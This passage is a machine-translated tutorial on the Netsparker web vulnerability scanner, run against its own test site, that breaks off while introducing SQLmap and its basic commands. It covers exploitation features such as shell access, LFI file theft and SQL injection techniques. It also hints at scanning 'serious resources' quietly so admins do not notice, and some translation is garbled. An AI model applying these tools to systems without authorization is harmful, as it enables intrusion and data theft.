necessary in our case and can easily be found on the Internet.Additional WebsitesAdditional sites and links to crawl The fact is that netsparker does not scan pages that have a different domain from the main one. As an example, I can cite my previous article, where there was a site ixi.store. When switching to the affiliate program, we were transferred to the partner.ixi.store domain. So the program will scan only ixi.store, but will not compile a sitemap of partner.ixi.storeTherefore, to achieve a full scan, you need to add this domain to the augmented scan lists: To do this, just insert the link we need into the text field and click on the square on the right in the Canonicial column to make a check mark appear. It is also worth warning that the program accepts links only in the correct form. That is, in the form of Партнерка магазина, CPA, аффилиат сеть, дропшиппинг ' Партнерская программа интернет-магазина IXI.STORE . Links like partner.ixi.store will be considered incorrect: Imported LinksLinks that the netsparker will crawl in addition to the main domain. Also, when the Scan Imported Links Only button is selected, the program will scan only what we have thrown here. Let's explore the main functions of this menu.Add - adding links After clicking on this button, a new configuration window opens: This is a form for creating a request for scanning and adding a link to the list of scanned. It's very simple, because the program will do everything automatically for you.Let's say we have a link Rybolov.ORG - рыболовный магазин с доставкой по России, товары для рыбалки почтой Интернет-магазин Rybolov.ORG - рыболовные товары с доставкой по России. Доставка почтой, в том числе наложенным платежом, курьером, транспортными компаниями, пункты самовывоза. rybolov.org that we want to add. To do this, just insert this link into the Host line. The domain that we will scan is usually entered there. But if we are going to “conduct an investigation” on individual links and sites, we can safely paste the copied into this field. The program will automatically edit everything: If we have a completely different site in the scan profile, the netsparker will warn us about this and suggest changing the header. Yes - ChangeNo - Do not changeEdit - edit the entered link. The same can be done with two clicks on the desired line. Delete - delete the selected line. Another option is to press the delete button on your keyboard Clear - complete clearing of the list, deletes all lines Search - search through the list. This function can be called by the key combination Ctrl + F Import From File - import data from files. It also accepts reports from other programs: After choosing the type of imported file - select this file on your computer.Enter Links - manual entry of links. In addition, you can choose the format of the links you enter. In my case, it's Relative or Absoute Links After entering the links, we see the following picture: Everything was imported successfullyURL RewriteLink conversions. This makes it much easier for search engines to index all pages on the site. Use Heuristic URL Rewrite Support - The program will automatically detect other URL rewriting rules. Both custom and heuristic rules will also apply. Root Path Maximum Dynamic Signatures - maximum dynamic signatures in the root path. By default, their value is 60.Sub Path Maximum Dynamic Signatures - maximum dynamic signatures of the sub path. Usually the value is 30.Block Separators - separators. Classic separators are / $.,; |:Analyzable Extensions - extensions that will be analyzed. In our case htm and html.Use Custom Rewrite Rules - netsparker will use custom (custom) link rewriting rules. To create / test a rule - click on the New button A window opens where we will edit the link for the example. We will use Rybolov.ORG - рыболовный магазин с доставкой по России, товары для рыбалки почтой Интернет-магазин Rybolov.ORG - рыболовные товары с доставкой по России. Доставка почтой, в том числе наложенным платежом, курьером, транспортными компаниями, пункты самовывоза. rybolov.org . Here we need to choose where we will rewrite and what: Select the parameter to be overwritten, select its type and enter the name of the parameter. There are a lot of parameter types, but if you don't want to mess around, choose Any. After these actions, we can observe how the program itself creates regular expressions and executes new rewriting rules. To delete a rule, select the required line and click on Delete: No URL Rewrite - do not convert links We're done with this menu. It remains to consider the Authentication menu. This menu is responsible for configuring authentication on the scanned resource. Sometimes a resource can be closed, and for a full report you will need to log in to it.We will consider this function through authorization at php.testsparker.com. It is intended for testing the netsparker, and it seems to me that it is great for an illustrative example. Let's start!FormSelect a form for authorization on the resource. To “enable” automatic authorization, you must check the Enabled box: Now we need a link to the data entry form to enter the personal account. In our case, this is the link http://php.testsparker.com/auth/login.php. We enter it in the Login Form URL: After that, enter your login information. They are entered in the Personas field.Active - selection of a combination of login and password that will be usedUsername - UsernamePassword - User passwordWe will fill in the data as follows:Login - adminPassword - admin123456These data are written on the site itself: After entering, everything should look like this: There are also settings for authorization by login and password. We'll look at them in turn: Interactive Login - The program enters data and then transfers control to the user. It is mainly used to bypass captcha, the user of the program enters it here manually, and then completes the authorization and transfers control back to the program.Override Target URL with authenticated page - Use the final page of the authentication process at the beginning of the entered url. If this option is selected, then netsparker will not make a request to the specified target url.Detect Bearer Authorization Token - if an AJAX request is received after authorization on the site, the intercepted tokens will be used for scanning.Now let's verify the login and logout functions. This is done using the Verify Login & Logout button. It looks like this: Immediately (or almost immediately) a window opens: This window can be roughly divided into two sections: 1 - Input check section 2 - Output check section Immediately after opening this window, netsparker will begin initializing the login.The circles in the lower right corners of the sections will indicate the work done. They are yellow by default. Look like this: Immediately after the initialization of the input, work on the output begins. The completed work will look like this: If the program has coped with the task, the circle in each corner will be green: You can check if the login page is verified in the settings menu of the authentication form, which we reviewed earlier. The following message should have appeared next to the Enabled item: If the login has not been verified, we will write login scripts. It's not as complicated as you might think. I'll help you. To create a "plot" according to which the netsparker will initialize the input, click on the Custom Script item: After clicking, the program itself tries to explain to us how we will write scripts: I created this script earlier, so let's look at the left menu first. I will explain how scripts worknetsparker.auth.login (username, password); - the command should be the default. This is the initialization of variables with a login and password, which we entered into the form at the very beginning.As I understand it, the program fills in the form using a CSS selector, which is copied automatically.In order to create your own script, right-click on the login field. We are looking for it in the window on the right: Right-clicking on any item will always bring up the same menu. It consists of four points, of which we will use only two at most. But we will analyze everything at once: Log element to console - logging of the selected element to the console. A very convenient thing to avoid looking for an element in the element code After clicking on this item, find our element in the console below: This function is very convenient if we need to conjure with an element separately. For example, copy Selector, or just change.Generate Element code - automatic generation of code using the selected element. After clicking on this item, a line of code appears in the left menu. Of course, we will not understand anything right away, so I will specially analyze the line of this code for you:netsparker.auth.setValueByQuery ('# content> div.post> form> input [type = ”text”]: nth-child (1)', username);It consists of four elements 1 - netsparker.auth.setValueByQuery - defining actions to be performed on the element from which the first part is netsparker.auth. always static. The second part of the first element is of two kinds: setValueByQuery and clickByQuery. In the case of setValueByQuery, the program will write the data. clickByQuery, on the other hand, initiates a click on an element, it is usually used for buttons and other elements, such as links, etc. 2 - '#content> div.post> form> input [type = ”text”]: nth-child (1)' - this is the path to the element to which the actions described in the first element will be applied (respectively, this is either a click, or data entry). The path to the element is described in the form of a CSS Selector. To get such a path ourselves, we turn to the Log element to console, where in the console we copy Selector. Thus, we get an identical path that can be entered manually. For example, the path to the password field would be content> div.post> form> input [type = ”password”]: nth-child (3). Copied this from the console like this: 3 - username or password. These two variables were initialized with the first line netsparker.auth.login (username, password); ... Works only on text fields. As you understand, we are not going to enter anything into buttons, so these variables are applied only for text fields. 4 - Pause element. Together with it, we will consider the last point - Generate element code (delay 2000ms): This item adds a pause. By default, this is two thousand milliseconds (which is equal to two seconds). This value is appended in the case of a text field after the entered variable, for example, username: If we talk about buttons, then clicking on the authorization button will look like this: netsparker.auth.clickByQuery ('# content> div.post> form> input [type = ”submit”]: nth-child (7)'); ... In the case of a pause, the value is appended immediately after the path, since the variables, as I said, do not take any part. The pause option looks like this: netsparker.auth.clickByQuery ('# content> div.post> form> input [type = ”submit”]: nth-child (7)', 2000);Now let's formulate the mask by which the code is built:What to Do ('path', variable, pause);Now with this knowledge, we can write our own script (or generate via Generate element code ). The finished version will look like this: To test it, click on the Test Script button: And we observe the work of the script: If everything works, click on OK, after which we are thrown into the main start menu, and the Custom Scripts item is replenished: We are done with this point.Basic, NTLM / KerberosAuthentication via Basic, NTLM and Kerberos protocols We will linger on this topic a little longer to figure out what kind of protocols they are.The basic protocol can be found, for example, when trying to connect to FTP of any site through a browser. NTLM is a network authentication protocol that was developed by Microsoft specifically for its operating systemsKerberos is also a network authentication protocol, the mechanism of which is mutual authentication between a client and a server. It is also supported by operating systems of the Windows family. A more secure protocol based on the Single Sign-On principleIn addition to these three, the program supports two more types: Digest and Negotiate. Consider them as well: Digest (commonly known as a digest) - This is commonly used by web servers to process user credentials entered into a web browser. A similar method uses VoIPNegotiate is a scheme inherent in the Windows family that offers a choice between NTLM and KerberosNow we can start studying the form itself. It consists of five elements - the type of authentication (there are only five types that the program supports: Basic, NTLM Kerberos, Digest and Negotiate) 1 (Type) - Authentication type. 2 (URL Prefix) - URL to be logged in. 3 (Username) - Username 4 (Password) - User password 5 (Domain) - Domain, optional item. To test the entered credentials or just look at the work of the program - use the Test Credentials button There is also one more setting, the last one in this window.Do not expect challenge (Basic Authentication) - means that after authentication no problems or additional requirements should arise, just like with basic authentication In addition to all this, there are tips for each item in the netsparker. They are located at the bottom of the menu: Therefore, if you did not understand anything from what I told you, you can read the tips. And we go to the next point.Header Header customization. In some cases, resources use headers for authorization. This menu is necessary to indicate these very titles. It is worth paying attention to the hint, which says that the title should contain only ASCII characters. Now about its functionality. There are only two settings here:Name - the name of the titleValue - the value for the title.Example: name is auth, value is true. It will look like this: You can use a kind of built-in constructor, which is called on the Add Authorization Header button After clicking on this button, the following window opens: In Type we select the type, and in Credentials the same value. In order not to get stuck at this point, I will enter a random value in order to show what is written at the output. To save the data, click Save To delete a line - click on any value ( Name or Value ), and press Delete: Client CertificationClient certificate for authorization on the resource By default, this is DO_NOT_TRUST_NetsparkerRoot, but you can add your own by clicking on the Add New button The program accepts PFX and P12 filesPFX and P12 are extensions to the PKCS # 12 standard. It did not become clearer, as I see it. This standard is used in cryptography. The very name PKCS is an abbreviation for “Public Key Cryptography Standards”, which translates as “Public Key Cryptography Standards”. In our opinion, PKCS will sound like SKOK. In our case, this is PKCS # 12, which is a file format for storing keys that is recognized and used by many browsers and email agents. PFX and P12 are the same extensions.Smart cardAuthentication on the resource through a readable card. If you have a similar card - activate the item To add data - click on Import Smart Carf Certificate Then netsparker will start looking for a driver for reading cards, and then save the certificate it read. After reading the card, enter the pincode in the PIN field, and click on Get Certificates. After this procedure, click Import and in the main menu select the certificate we need, which the program read earlier.We have disassembled the scan setting. Now we can proceed to the main window of the Netsparker program!Let's start a test scan. 1 - Main pages of the program. During the scan, two more are added: Link and Vulnerability . 2 - Menu with items and functions. For each page, everything is different and in different quantities. Lord, I still have to consider each of them ... 3 - Sitemap generated by the program during scanning. 4 - Controlled scanning. You can check the items from the third menu (which will appear in the upper Choose Parametrs to Scan window) separately for the parameters selected in the Choose Security Tests window. By the way, this is a very useful item if in the scan parameters you have chosen only to draw up a map without attacks. Thus, you can hit the right nodes clearly, and not rape the entire site, as it happens with a normal scan. 5 - Window with the most detailed scan report (and not only). 6 - List of found items, grouped by netsparker database. Easier to show in practice. 7 - Brief information about the scan. Scanning speed (currently and average), number of requests, failed requests, time spent. 8 - Found vulnerabilities, potential vulnerabilities, flaws and general information about “problem” areas. 9 - Program log, report on work. So. Let's do a full scan of php.testsparker.com. Just a scan, no settings. Unless we'll add authorization via login and password. How to do it - see above. Just in case, let me remind you: Now let's wait a bit to see the full picture. This site was created specifically to test the program, so it contains all possible holes, flaws and vulnerabilities. We are better off, because we can see what the program is capable of.First, let's examine the functions of menu number one (1): FileWork with program files. Import, export, etc.Let's examine this function: All autosaves and saves of previous scans are located here. To load - we find the save we need and load it by double clicking on it.You can upload someone else's (or your own, if saved separately) report using the Browse button To export a report, use the Export button in the left menu Then we create a file with the nss extension. In fact, two files are created: Everything is in order, part is the report, part is the base of the report.After that, the data download icon appears in the center of the screen: When the download is over, the Home page will open. And to return to it without loading the report, there is a button in the upper left corner: You can also look at the beautiful and minimalistic design of the About window: Well, and Exit, if you are suddenly tired of everything and want to do something else: All clear? It's strange if not. If it's still not clear, read it again.It's time to deal with the Home tab. New - new scan Schedule Scan - scheduled scanning. Incremental Scan - Augmented scan based on our Schedule Incremental - a postponed additional scan that requires entering a report on which the work will be carried out. New Instanse - opens a new netsparker. Retest all - retest all found vulnerabilities to find out if they were fixed or not. Useful if you are checking your resource. Hawk Check - check for Out-of-band vulnerabilities. These vulnerabilities are vulnerabilities such as the: The Blind the SQL Injection, The Blind Cross-site the Scripting etc .. It also applies to post-scan. Import - import report \ session Export - export our session \ report Scan Policy Editor - editing the resource scan policy: Consider this point. Here you can change the policy right during the scan. For example, if during the scan it turned out that this is a Linux system, all tests under Windows can be disabled to speed up the work.If we look at the interesting things, then there are a couple of quite tasty parameters. For example, a list of ignored mail accounts. If you have similar ones, write them down. The item is called Ignored Email AddressesTo configure, copy the Extensive Security Checks item. To copy an item, first select the item we need, and then click on the Clone button: The copied item will appear at the very bottom.Security Checks - Vulnerabilities for which the resource will be scanned. Moreover. Each vulnerability has its own scan settings. For example, take our favorite SQL injection: Crawling - search for links, drawing up a sitemap, studying a resource. Crawling Page Limit - Page limit.Maximum Signature - the maximum number of site signaturesMaximum Page Visits - The maximum number of visits to the site pagesWait for Resource Finder Checks to Finish - waiting for the resource search check to completeText Parser - parser text from the crawled resourceParse SOAP Web Services - A type of parsing of WSDL files (WSDL is a language for describing web services and accessing them)Parse REST Web Services - Parses WADL files and Swagger (framework and specification for defining REST APIs).Fallback to GET - can we get to work already? no? okay... The program sends special HEAD requests to reveal hidden files and directories. If all else fails, the netsparker reverts to the GET option. Usually offAdd Related Links - Specifies whether to crawl all related links when a new one is found. Adds all related links to the sitemap. Usually includedEnable Parameter-Based Navigation - if the target website uses parameters to work with content other than pages. For example, instead of the page tovar.php, it uses a parameter like page = tovar. Usually offNavigational Parameter RegEx - navigation regular expressions for the program to work by resource.Maximum Page Visits - the maximum number of visits to a page that contains navigation parameters, we talked about them above. Load Preset Values - Load presets of all items for different types of sites.DOM Load Timeout - Timeout in milliseconds to wait for the site page to load before starting the JS DOM simulation. DOM stands for Document Object Model, which translates to “ Document Object Model”. A programming interface that allows programs and scripts to access the content of HTML and XML files.DOM Simulation timeout - Timeout in milliseconds (all timeouts are in milliseconds, I won't write this anymore, that's all) before the end of the JS DOM simulation.Intervent Timeout - timeout after a JS event trigger before new events start. Just like in life.Max Simulated Elements - the maximum number of elements in the simulation.Skip Threshold - Skip threshold. The number of elements that will be simulated / simulated before starting the total skip of all other elements.Elements to skip - the number of skipped elements after passing the skip threshold (referring to the point above).Max Modified Element Depth - The simulation begins to skip examining each of the cascading elements after passing through the depth threshold.Pre-simulation Wait - timeout before starting simulation / simulation and after loading the pageExclude by CSS Selector - Exclude HTML elements from event modeling using the CSS Selector function. All matching elements will be excluded, including their derivatives. We will have to select the elements manually: After completing the work, click on Select, and enjoy the recorded data.Max Option Elements - the maximum number of optional elements per selected element to simulate.Persistent JavaScript Cookies - Semicolon - separated cookie names.Open Redirect Conf. Timeout - timeout before the end of the JS DOM simulation to confirm an open redirect. How. Where - do not ask. Where the redirection goes there and there will be confirmation.XSS Confirmation Timeout - timeout before the end of the JS DOM simulation for XSS confirmation. Yes, there is such a thing too.Filter document events - Filter the events attached to the document by name to reduce the number of events triggered during simulation.Ignore document events - ignore events attached to a documentFilter 'colon' events - filter for events containing a colon. Commonly used by frameworks.Extract static resources - Extract static resources from DOM elements.Allow out-of-scope XML HTTP requests during simulation - A useful feature if the target is not unloaded due to a curved scan profile settingNow we are gradually moving on to other settings.Attacking Maximum Number of Parameters to Attack on Single Page - the maximum number of attacked parameters on one page.Enable Proof Generation - generate an exploit report after confirming a vulnerability.Attack Parameter Names - Generate additional. attacks using the name of the request parameter.Attack User-Agent Header - Generate additional. attacks using user agent headerOptimize Header Attack - I didn't understand how this function works. I only understood that the header attack will target all linksOptimize Attack to Recurring Parameters - search for duplicate parameters in different URLs. Attacks everything that is included in the limit on the attacked elements on the page (Maximum Number of Parameters to Attack on Single Page)Recurring Parameters Attack Limit - page limit for attack by repeated parametersAnti-CSRF Token Names (Comma Separated) - comma separated names of tokens for protection against CSRF attacks ( Cross Site Request Forgery in translation as “cross-site request forgery”)Enable Random Parameter Attacks in Cross-site Scripting Engine - using additional parameters on pages to detect vulnerabilities such as Cross-site ScriptingWe continue to suffer, learning all the functions of the program.Custom 404 Setting up 404 pages, as I understand it. Some sites use their own beautiful ones. And now they are very different from the standard 404. So that the program does not be stupid and does not scan empty answers, we choose what values the 404 pages have to detect them.Auto Custom 404 - Automatic recognition. You need to enter the maximum number of 404 signatures.Manual Custom 404 - You will have to enter the regular rules for 404 manually.Disabled - standard 404.Maximum 404 pages to Attack - the number of 404 pages to bypass and attack.Go to the Scope item Case Sensetive - Increased SQL Injection Report. Although the scan will be more sensitive, the result was never affected, no matter how much I used netsparker. And by default it is usually always off.Bypass Scope for Static Checks - detection of vulnerabilities even if a scan is specified from a specific page and further, without going down to the domain.Enable Content-type Checks - the program will ignore and not analyze pages whose content title matches the values given in the list.Block Ad Networks - Always on. If there is a link to an advertising resource from the list, the program will ignore the scan of this resource.Next on the list is Ignored Parameters Parameters are simply ignored.closer to the end - Form Values Form data. You can add your data via URL or by uploading past scans. We will consider this as regular rules.Brute force Netsparker has about sixty brute force combinations. You can use this function to check for standard login form passwords.Autocomplete Data for searching forms with autocomplete.Netsparker hawk It's simple, setting up one of the post-scans. The URL is inserted by default.Ignored Email Adresses regulars of ignored mailboxes.CSRF Configuring a CSRF attackWeb Storage Web storageAuto Send To Configuring Automatic SubmissionExtensions Scanned extensions and some settings for them: Attacked parameter or not, investigate or not, and so on. To change this or that parameter - click on it and select the option you need from the list.Go to the HTTP tabLet's examine the Request item User Agent - data of user agents. Name and meaningRequset Timeout (seconds) - the program will retry the request if the previous request took more than the specified time. This time the timeout is set in seconds.Accept - setting the headers that the netsparker will use in all requests.Accept Charset - setting the encoding for all subsequent requests.Accept Language - Setting the language that will be used in all requestsThen there are just three checkboxes: Gzip support, server load reduction, cookie support.Concurrent Connections - the number of connections to the target. If you put too much, there may be connection problems and / or server failure (DoS). Haha, dudosThe second point is Proxy Setting the used proxies for the scan. You can chop up your proxies, just like in my last article about brute force, where you can connect your account with proxies to the program Penultimate item - Headers This is the setting for the headers.The last one is SSL / TLS Configuring supported protocols.Now the third menu item is Knowledge Base.And immediately the first page of the menu - General Connecting this very base to the scan. The thing is useful, we leave it on.The last item in this window is Comments Regular expressions for finding information from comments. You can add your own search terms if you know what to look for.Everything! We can go back to the program itself. I hope there will be no more such large-scale menus.We continue to explore our top menu: There are a couple of unstudied items left for eac. For example, Report Policy Editor In fact, this is a configuration of vulnerabilities, the presence of which will be reported by the program: Another important point is Options These are program settings. Everything is very simple and straightforward, let's figure it out. Believe me, you will come here sometimes. Not as often as in the scan settings (which I will dream about after this article), but you will go.This is what the window looks like: Now everything is in turn.General Language - the language of the program. Usually only two languages are supported: English and Korean.Sounds - setting the sounds of the program. Type of sound notifications when a vulnerability is “caught”To add your own sounds or customize existing ones, there is a Configure sounds button :Storage Setting up storage locations.Data Directory is a storage location for scanned data and the like.Password Encryption Scope - sorting passwords for setting up authentication.Internal proxy Internal proxies.Listening port - proxy portRegister as the System Proxy - connecting the system proxy settings from IE.Allow Remote Connections - the program will listen to all connected interfaces "from outside"Use Custom Root Certificate - use your own root certificate. The program will read files with the extension. cer and. pfx (we talked about them earlier, by the way).Logging Level Logging and customization.Enable Logging - Enables the logging function.Performance Analysis - Performance analysis.Show Attack Possibilites Knowledge Base Node - show potential vulnerabilities of a node in the Knowledge Base function tree.Default Log Level - Select what will be reported and what will be logged by the program. The further we move the slider, the more will be logged. You can see the number of logged elements just below the slider: Categories - categories of logging.Auto Update Automatic updates. Why is this included for me? Turn off.Scan Policy Suggest Optimization - a warning about the optimization of the scan policy.Proxy Setting up external proxies.Use System Proxy - Using proxies with IEUse Custom Proxy - use your own proxies. Data entry will be required. As in brute force. I talked about this earlier, by the way. And in the last article about databases, you can find a similar function. Nothing complicated. Enter the Username, Password, domain on which authentication will take place, etc. Cloud Netsparker's cloud storage settings. Disable the function and skip this item.Well, the last menu is Extensions with a single Send To Actions item. Setting up automatic sending of data. If you will use it, the easiest way is to set up a submission to GitHub. I've experimented with this function, and somehow it didn't work out very well. This function is optional, so we skip it.If you realized that you were tricky with the settings, then you can reset them to the standard ones: Understood? Excellent! There is not much.Go to the new menu: View Well, I won't say much here. It's just setting up windows - which ones to show, which ones to not. The main six are always active, the rest are opened either automatically or manually, if you like. I'll just look at a couple of interesting features.Encoder and Request Builder can be used outside the scan as separate functions. Lucky they are next to each other Let's look at the Encoder utility first. A useful utility for decrypting encoded / ciphertext. The only thing it doesn't decode is hashes. Has two fields. Entering text: And the text output: There is a settings menu in between. Encode text, or decode: And now my favorite. Request Builder. A very handy thing for working with queries. True, the utility supports only seven requests: GET, POST, HEAD, PUT, PATCH, DELETE, and OPTIONS. I spoke about them, and I will not repeat myself. To send a request - use the button in the upper right corner of the Send Request The program will configure everything automatically - just paste the link into the Host line. Only the choice of the type of request depends on you. Actually, that's all with that. I showed the main functions, then it all depends on what you want.To return windows to default - use the Reset Layout button The next tab to learn is Reporting This is the export of a scan report, but more advanced, it is possible to generate a report for import into other programs. OWASP Top Ten 2010 Report - A report for the OWASP project, in my case unreadable. Detailed Scan Report - same raspberry as with OWASP HIPAA Compliance Report is a human, readable report compiled in accordance with GOST HIPAA ( Health Insurance Portability and Accountability Act ), a la the health insurance accountability act, but in the Internet OWASP Top Ten 2013 Report - The report for the OWASP 2013 project, in my case, remains unreadable. OWASP Top Ten 2017 Report - Report for the OWASP 2017 project. Unlike previous OWASPs, readable and convenient PCI Compliance Report - PCI Compliance Report, Compration Report is a short report. My key is broken like a border in Letov's song Executive Summary Report - The shortest and most beautiful report on found issues with an explanation. Beautiful pie chart. Knowledge Base Report is a “knowledge base” only report. I have it broken. Who still does not understand what a "knowledge base" is - please read: These are the collected features of the site and found details such as postal addresses or code comments. A very useful thing. We will get acquainted with it a little later, when we finish with the main menu.[*]ModSecurity WAF Rules - Report of vulnerable parameters and rules of the ModSec firewall. I don’t use it, the report works.[/LIST] Wow, there are still 10 points left. Let me simplify the task. 1 - Export the list of found links 2 - Export the list of crawled links 3 - Exporting the list of found vulnerabilities There are only three options for the exported list: in CSV, JSON and XML files.The last tenth function is a detailed report on the vulnerabilities found in XML format. Vulnerabilities List - Detailed (XML) Before we finish parsing the reports, I will disassemble the window for saving the report: Path - the path where the report will be savedPolicy - reporting policy. By default, this is the Default Report PolicyExport as HTML - Save report to HTML documentExport as PDF - Save report to PDF documentOpen Generated Report - Open a saved report. If you make two reports - PDF and HTML, then both will open upon creation.Save - saveThe next tab is Help. This menu has nothing to do with the functionality of the program, so we will not consider it.The active items in the Vulnerability tab depend on what kind of vulnerability Netsparker found For example, let's take one of the previously found vulnerabilities: In addition, pages are added in the main block. Usually there are two new pages - Vulnerability and Browser View. We'll look at them later when we work with the main interface.Retest - to double-check the found vulnerability. Copy as cURL - copy the cURL request for this link Generate Exploit - Creates XSS and CSRF vulnerabilities, works only for Cross-site Scripting vulnerabilities. Accordingly, in order to be able to generate such a vulnerability, you need to select a link that has a confirmed Cross-site Scripting. Execute SQL commands - execution of SQL commands. Only works with SQL injection vulnerabilities Get Shell - using a shell for remote execution. Can only be exploited if there is a Code Evaluation vulnerability. LFI Exploitation - download system and just important files from the site server if there is a Local File Inclusion vulnerability Short Names - short names. I have never used it. Ignore from this Scan - ignore vulnerability or item for this scan Configure Send To Action - See the Extensions menu, Send To Actions. ModSecurity - As I understand it, this is a report of the vulnerable settings and rules of the ModSec firewall specifically to this link. So, everything with this menu item. It remains to consider the latter.Link Controlled Scan - a controlled scan of this particular page. Send Request Builder - We have already analyzed this Copy URL - copy the URL. You can also copy the URL from the Vulnerability tab Next, there is a whole bunch of useless functions that I have never used - open this page in the selected browser. Not in the program, but in your browser. By the way, I've always wondered why the icons of all browsers are always round. Amigo doesn't count - it's a virus.The last push. Let's examine the main window in more detail. This should have been done at the very beginning, but I decided to debug the sweet and simple for later.Sitemap - sitemap. To get a report on a particular phenomenon, page and vulnerability found, you need to click on the item of interest to us.If you right-click the mouse, you can call up a quick menu with basic functions. We've covered everything before It is worth considering only a couple of individual ones that will help us a lot in the future.Copy SQLmap Command - the program generates a command for SQLmap and copies it to the clipboard. Perhaps one of the most useful features.Exclude This Branch from Attack - exclude all pages of this node from the list of attackedExpand - expand a nodeCollapse - collapse a nodeControlled Scan - controlled scan. To get started, you need to select the desired parameter in the sitemap, select it in the upper list, select what we will scan for in the lower list and click on the Scan button. I have already talked about it several times. Once again, I will say that it is very useful when you do not attack with a scan, but simply draw up a sitemap, and then hit specific nodes, and do not force the entire system.One large window. Several tabs. Let's start with the first one - Scan A detailed report on the current scan: the attacked page, its parameters, the attack method, what is happening, passive analysis, etc. There is even a timer showing how long the page has already been scanned.HTTP Request / Response - a log of HTTP requests and responses, there is a search function by response. Attack Radar - visualization of problematic sides and their criticality. Nice, huh? You can also disable the grid with the Logarithmic item.The other two we have already considered earlier.Browser View - viewing this page “in the browser”. Purely visual function, nothing more. The page itself does not work. That's all with that. These are the main pages that we will have by default.Let's proceed to the Knowledge Base window. This window is linked to the previous one, and when we click on the element of interest, a new page opens in the previous window. I don't think I need to explain what is what here. You can poke at random and see what has opened. Everything is intuitively clear from the icons. But since I promised to consider it in more detail, it is worthwhile to deal with each item separately:Comments - Comments found by the programCrawling Performance - Crawling performance report for each functionCSS Files - Found CSS filesEmail Addresses - Email addresses found on the siteExternal Frames - External framesExternal Scripts - External scriptsFile Extensions - all file extensions on the siteInteresting Headers - Headers that the program paid attention toMIME Types - found MIME typesOut of Scope Links - links and pages that were excluded from scanningProofs - basic data pulled from the server through exploits (for example, data from 😄 \ windows \ win.ini or a list of server processes)Scan Performance - Report on the performance of the entire scanSite Profile - site profileSlowest Pages - pages that took the most time to loadWeb Pages With Inputs - pages that have an input function Issues - a short report on found problems, vulnerabilities and just information. Can be grouped by severity, by type of vulnerability, by “proof” and by page.Everything. We've completely disassembled Netsparker. I must say right away: do not forget to configure the program when checking serious resources! The admins will not have any questions if suddenly someone searches through the entire site, drawing up a map. But if you rape the site, then it will certainly be noticed.Therefore, use the settings and work correctly!Let's get down to the next tool. This can be considered the last part of this article - in it I will teach you how to use SQLmap. But first, I'll tell you what it is and what we need to work.SQLmap automates the process of finding and exploiting SQL injection, and not only finds a security hole, but exploits it to the fullest. Supports all types of injections. The sqlmap functionality allows you to: dump databases, automatically search in the database, extract and decrypt logins and passwords, launch cmd shell, launch an interactive sql shell, in which you only need to write SQL queries to the database, and sqlmap itself will compose the payload for injection. There is an excellent Cheet Sheet that shows all the features of this tool in two pages.To work with this utility, we need Python version 2.7. All links are given at the very beginning and I see no point in telling what to download and what to install.In this article, I use an operating system of the Windows family, therefore, the analysis will be for this OS. In fact, working with SQLmap on shind is actually no different from working with it on Linux. The Internet is full of manuals for this program, so we will consider only the main functionality.There are five main classes of SQL injection, and all of them are supported bysqlmap: UNION query SQL injection. The classic version of SQL injection, when an expression starting with “UNION ALL SELECT” is passed to the vulnerable parameter. This technique works when web applications directly return the output of the SELECT command to the page: using a for loop or similar, so that each record of the retrieved database selection is sequentially output to the page. Sqlmap can also exploit the situation when only the first record from the selection is returned (Partial UNION query SQL injection). Error-based SQL injection. In the case of this attack, the scanner replaces or adds a syntactically incorrect expression to the vulnerable parameter, after which it parses the HTTP response (headers and body) in search of DBMS errors, which would contain a previously known injected sequence of characters and somewhere “nearby” output to the desired us a subquery. This technique only works when the web application for some reason (most often for debugging purposes) exposes DBMS errors. Stacked queries SQL injection. The scanner checks if the web application supports sequential requests and, if they do, adds a semicolon ( to the vulnerable HTTP request parameter, followed by an injected SQL request. This technique is mainly used to inject non-SELECT SQL commands, such as manipulating data (using INSERT or DELETE). It is noteworthy that the technique can potentially lead to the ability to read / write from the file system, as well as the execution of commands in the OS. However, depending on the database management system used as the back-end, as well as user privileges. Boolean-based blind SQL injection... Implementation of the so-called blind injection: data from the database in a "pure" form are not returned anywhere by a vulnerable web application. The technique is also called deductive. Sqlmap adds a syntactically well-formed expression containing a SELECT subquery (or any other command to retrieve a selection from the database) to the vulnerable HTTP request parameter. For each HTTP response received, the headers / body of the page is compared with the response to the original request, so the utility can determine the output of the embedded SQL statement character by character. Alternatively, the user can supply a string or regular expression to define "true" pages (hence the name of the attack). The binary search algorithm implemented in sqlmap to perform this technique is capable of retrieving each character in the output with a maximum of seven HTTP requests. Time-based blind SQL injection. Completely blind injection. Just like in the previous case, the scanner plays with the vulnerable parameter. But in this case, it adds a subquery that causes the DBMS to pause for a specified number of seconds (for example, using the SLEEP () or BENCHMARK () commands). Using this feature, the scanner can retrieve data from the database character by character, comparing the response time to the original request and to the request with the embedded code. It also uses a binary search algorithm. In addition, a special method for data verification is applied to reduce the likelihood of incorrect character extraction due to unstable connection. Despite the fact that the scanner is able to automatically exploit the found vulnerabilities, you need to understand in detail each of the techniques used. If the topic of SQL injection is still familiar to you only on your fingers, I recommend flipping through the archive] [or read Dmitry Evteev's manual " SQL Injection: From A to Z ". It is also important to understand that attack implementations are often very different for different DBMSs. All these cases are able to handle sqlmap and currently supports MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB.Remember that before we learned how to use NetSparker? If Netsparker finds at least one Sql injection, then SqlMap will allow it to be exploited.I got bored with conventional injections, so I suggest considering Blind Injection to make it more interesting. We will not search for a long time - we will take the link from the site that we crawled earlier. Netsparker Test Web Site - PHP By the way, when installing python, there is a clause that adds the python executable file to path, so as not to write the path to it every time. I am still a fruit and for my fruit reasons I will not do this. Just because I'm not looking for easy ways. But in fact, I just realized that I fucked up, and I am writing this paragraph at the end of the articleNow we open the command line. I installed python on the C drive. Next to python I also installed sqlmap. Now we need to check if everything works. To do this, use the CD command to go to the root: CD 😄 \To run the utility, you first need to register the path to the python executable file: Python27 \ Python.exe, and then, separated by a space, the path to the utility itself: SQLmap \ sqlmap.py and press Enter. Don't copy SQLmap to python folder! Don't worry, this error is caused by a "blank" startup. Let's check one of the proposed options. Use -h to get a list of commands. Press Enter again (this time to continue), and enter:Python27 \ Python.exe SQLmap \ sqlmap.py -h Everything is working.To get started, you need to use the -u option. It is used to indicate an attacked link. The correct command would look like this:Python27 \ Python.exe SQLmap \ sqlmap.py -u Netsparker Test Web Site - PHP It is necessary to follow the whole process, since the program may ask us how to proceed next: Usually we are asked a simple yes or no. To answer yes - enter Y or y, otherwise - N or n. The capital letter in the question means the default choice, and if you are too lazy to press two buttons, you can press one - Enter, and the program will continue working with the default choice. What? Are you too lazy? Okay. To make the program act at its own discretion, we use –batch. 